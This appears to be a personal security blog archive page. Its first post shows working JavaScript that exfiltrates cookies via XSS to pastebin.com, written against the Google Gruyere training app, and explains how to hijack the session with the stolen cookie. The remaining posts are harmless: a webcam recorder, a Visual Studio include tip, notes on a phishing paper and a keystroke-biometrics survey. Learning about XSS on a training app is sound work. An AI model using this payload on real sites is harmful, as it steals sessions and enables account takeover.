XSS Session Hijacking proof of concept

17 February, 2011 § 6 Comments

I’ve been spending time lately playing with Google Gruyere. I first got introduced to it back when it was called Jarlsberg. After finding all the cross-site scripting vulnerabilities, I thought it would be cool to actually exploit them.

Until now, I had never actually exploited any of the holes I had found. When disclosing security vulnerabilities, I understood the potential impact a hole carried with it. While it was easy to convince myself of the necessity of a fix, I've learned it's much harder to convince others. So I set out to implement a proof of concept for one of the holes in Google Gruyere.

Gruyere allows users to add links to their homepage; however, the application doesn't sanitize the input. Try the following as your homepage and you'll get a nice alert dialog:

javascript:alert(1)

To exploit this, I wrote the following JavaScript:

function a() {
  var xhr = new XMLHttpRequest();
  // Grab the current session cookie and use it as the body of a new paste.
  var params = 'paste_code=' + document.cookie + '&paste_name=XSS_poc';
  xhr.open("POST", "http://pastebin.com/api_public.php", true);
  xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xhr.setRequestHeader("Content-length", params.length + "");
  xhr.setRequestHeader("Connection", "close");
  xhr.send(params);
}
a();

I then used the Google Closure Compiler to compress this JavaScript by over 18%, arriving at the following final code:

var a=new XMLHttpRequest,b="paste_code="+document.cookie+"&paste_name=XSS_poc";a.open("POST","http://pastebin.com/api_public.php",true);a.setRequestHeader("Content-type","application/x-www-form-urlencoded");a.setRequestHeader("Content-length",b.length+"");a.setRequestHeader("Connection","close");a.send(b);

Prefix the JavaScript code with `javascript:`, and you’re off to the races.

So how does this work? When executed, this JavaScript takes the document’s cookie and sends it to Pastebin.com. The attacker can then retrieve the cookie by searching Pastebin for “XSS_poc”.

I then used a Google Chrome extension called Edit This Cookie to change my cookie to that of the victim. Hitting Refresh on the page now showed that I was logged in as the victim 🙂

I recorded a video of the attack and have embedded it below. The music was created by Kevin MacLeod.

What do you think?

Weekend hacking: Homebrew security camera with infinite recording length

24 January, 2011 § 1 Comment

I’ve seen people use security cameras before. Most cameras are set up so that the user puts in a VHS tape, presses record, and repeats this process over and over. If something happens during the recording, the tape is saved as evidence; otherwise it is rewound and recorded over again.

This always seemed like a lot of work for something that is purely reactive. Let’s look at the scenario again: the user is proactively doing a lot of work in the hopes that they will be able to react. Put another way, if you make 20 dollars an hour and spend five or six hours a month rewinding tapes and pressing record, that’s over 100 dollars of labor; if less than 100 dollars of damage is caught on tape, it wasn’t worth it.

So how about a different solution? At midnight on Friday I decided I would find something better. I had in mind a security camera that kept a circular buffer of the last 8 or so hours; if nothing happened, it would just overwrite what it had previously recorded.
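The circular-buffer idea is simple enough to sketch. Here’s a minimal illustration in Python (my own sketch, not code from the eventual script; all names and sizes are made up): snapshots are written into a fixed pool of numbered files, so once the pool is full, the oldest frame is silently overwritten and disk usage stays bounded.

import os

FPS = 10                              # snapshots per second
HOURS = 8                             # how much history to keep
CAPACITY = FPS * 60 * 60 * HOURS      # total snapshot slots in the buffer

counter = 0

def store_snapshot(image):
    """Write a PIL image into the next slot, wrapping around when full."""
    global counter
    slot = counter % CAPACITY         # the oldest slot gets overwritten
    # Assumes the "buffer" directory already exists.
    image.save(os.path.join("buffer", "frame_%06d.jpg" % slot))
    counter += 1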

Unfortunately I had no luck finding such a program on the internet, so I decided to write one myself. I first came across OpenCV, a free computer vision library. OpenCV is really powerful, but it looked like a lot of work, and I sure didn’t want to write this in C++. Luckily I found technobabbler’s tutorial on how to make a simple webcam application using Python.

I followed the tutorial and soon had a simple application running that could save a snapshot from the webcam at the click of a button. By 4:30am I had a working prototype that was doing just what I wanted.

Using Python 2.5, VideoCapture, PIL, pygame, and FFmpeg, I am able to keep the last 24 hours of snapshots (at 10 frames per second). If I ever want to save those 24 hours for reference, I simply hit the letter ‘s’ on the keyboard.
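For the curious, the heart of the main loop might look something like the sketch below, reusing store_snapshot from the earlier sketch. It assumes the VideoCapture Device API from technobabbler’s tutorial (Device().getImage() returning a PIL image), and archive_buffer() is a hypothetical helper standing in for the save-on-‘s’ behavior; the real script also involves FFmpeg for turning saved snapshots into video.

import time
import pygame
from VideoCapture import Device   # Windows-only webcam library

cam = Device()
pygame.init()
screen = pygame.display.set_mode((320, 240))   # a window is needed to receive key events

while True:
    store_snapshot(cam.getImage())             # grab a frame into the circular buffer
    for event in pygame.event.get():
        if event.type == pygame.KEYDOWN and event.key == pygame.K_s:
            archive_buffer()                   # hypothetical: copy the buffered slots aside
    time.sleep(1.0 / FPS)                      # roughly 10 frames per second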

I’ve made this script open-source under the GPL license and hosted it at Google Code. Let me know what you think.

Finding how a header file gets included

6 May, 2010 § 2 Comments

Have you ever had a header file that isn’t explicitly part of your Visual Studio solution generate warnings?

Recently I’ve been working on fixing static analysis warnings reported by Microsoft’s PREfast static analysis tool for C++. I ran into an issue, though, with some of the Microsoft Windows SDK v6.0 headers. One file, aptly named `strsafe.h`, can be the cause of tons of warnings in a build.

I looked around and found that the Windows SDK team is fully aware of the problem. They recommend wrapping the include for strsafe.h with pragmas, like so:

#include <CodeAnalysis/warnings.h>
#pragma warning(push)
#pragma warning(disable: ALL_CODE_ANALYSIS_WARNINGS)
#include <strsafe.h>
#pragma warning(pop)

So the first thing I did was search through my code to find out what included strsafe.h. It turns out that no file explicitly included it, so I figured it must be getting pulled in indirectly through another include file.

To find out which files are included in your build, you can turn on /showIncludes through Project Properties → Configuration Properties → C/C++ → Advanced → Show Includes.

/showIncludes prints out a tree of all of the files that get included when the project is built. Using this, I was able to find which of the SDK files we included ended up pulling in strsafe.h.
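To give a feel for it, the output looks roughly like the following (the paths and the include chain here are made up for illustration); each additional leading space after “including file:” means one level deeper in the include tree, which is what lets you trace the chain down to strsafe.h:

Note: including file: C:\Program Files\Microsoft SDKs\Windows\v6.0\Include\windows.h
Note: including file:  C:\Program Files\Microsoft SDKs\Windows\v6.0\Include\some_sdk_header.h
Note: including file:   C:\Program Files\Microsoft SDKs\Windows\v6.0\Include\strsafe.h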

The whole process, from turning the compiler flag on, to performing a rebuild, narrowing down the includes, and wrapping them with pragmas, took about half an hour in total. Suppressing the warnings still leaves a nasty taste in my mouth, but getting rid of them cut out a lot of noise surrounding the actual warnings that are more pressing.

Why Phishing Works

30 April, 2009 § Leave a comment

I just read a 2006 paper about why phishing works (“Why Phishing Works” by Dhamija, Tygar, and Hearst). Some of the notable comments in it come from participants in the usability study that was done:

From users who looked at security indicators in website content only:

“I never look at the numbers and letters up there [in the address bar]. I’m not sure what they are supposed to say.”

From users who looked at content and domain name only:

Many did not know what an IP address was; they referred to one as a “redirector address”, a “router number”, an “ISP number”, or “those number thingies in front of the name.”

From users who looked at all of the above and also for HTTPS in the address:
  • One never noticed the padlock in the browser chrome.
  • One stated that favicons in address bars indicate authenticity better than a padlock because they “cannot be copied.”
From users who looked for a padlock icon:

Some participants gave more credence to padlock icons that appeared within the content of the page as opposed to the browser chrome.

Other notes from the reading:

One user mentioned that she verifies the authenticity of a website by trying to log in to the website and seeing if it works. She said, “What’s the harm? Passwords are not dangerous to give out, like financial information.”

One of the last tests had the users look at a phishing site that was a direct copy of a real site. The site included an animated graphic of a bear and produced the following responses:

  • The “cute” design was a convincing factor of a legitimate website.
  • Two participants specifically mentioned the bear graphic, “because that would take a lot of effort to copy”.

Many found the animation appealing and reloaded the page multiple times just to see the animation again.

And last, but not least: when encountering a website with an invalid SSL certificate, the users accepted it, explaining it with quotes like these:

“I accepted the use of cookies”, “It asked me if I wanted to save my password on forms”, “It was a message from the website about spyware”

Interesting quotes. I’m not sure how to solve this problem. One solution could be to understand what users assume to be secure and simply design towards that.

Background Survey on Keyboard Biometrics

21 February, 2009 § Leave a comment

As part of my research in Computer and Network Security, I am looking into how we can make simple password protocols more secure without making the login process harder for the user. I have written a background study of previous research that has looked at this problem. Below is an excerpt, and at the bottom of the post you will find a link to my full background survey. Leave a comment and let me know what you think.

The most well-known and accepted way to authenticate users in computer systems is to have them enter a username and password. Other authentication techniques include the use of the user’s physical features (e.g., retinal or fingerprint scans) or requiring the user to have a special piece of hardware in their possession [1].

These added burdens placed on the user make software less usable and may even lead to users locking their systems down less often to avoid a lengthy login process. These systems are put in place for security, yet poor usability may actually lead to worse overall security.

One way to solve this problem is to continue to let users simply use their username and password to log in to their system. Previous research has shown that the same factors that make written signatures unique are found in a user’s typing pattern [2]. Meta information can be obtained about how the user enters this information to add another level of security to the authentication protocol, thus increasing security without affecting usability.
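As a concrete illustration of that meta information (my own sketch, not something from the survey): two classic keystroke-dynamics features are dwell time, how long each key is held down, and flight time, the gap between releasing one key and pressing the next. Given timestamped key events, both are simple to extract; the event format and names below are made up.

# Each event is (key, press_time, release_time), with times in milliseconds.
def typing_features(events):
    dwell = [release - press for _, press, release in events]
    flight = [events[i + 1][1] - events[i][2]    # next press minus last release
              for i in range(len(events) - 1)]
    return dwell, flight

# Example: the word "cat" typed with a particular rhythm.
events = [('c', 0, 80), ('a', 150, 240), ('t', 400, 470)]
dwell, flight = typing_features(events)
print(dwell)    # [80, 90, 70]   hold time per key
print(flight)   # [70, 160]      gap between consecutive keys

A profile built from many logins could then flag an attempt whose timing vector is far from the user’s average, even when the password itself is correct.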

For more information and to read the rest of my background survey, you can read the PDF: Background Survey on Keyboard Biometrics
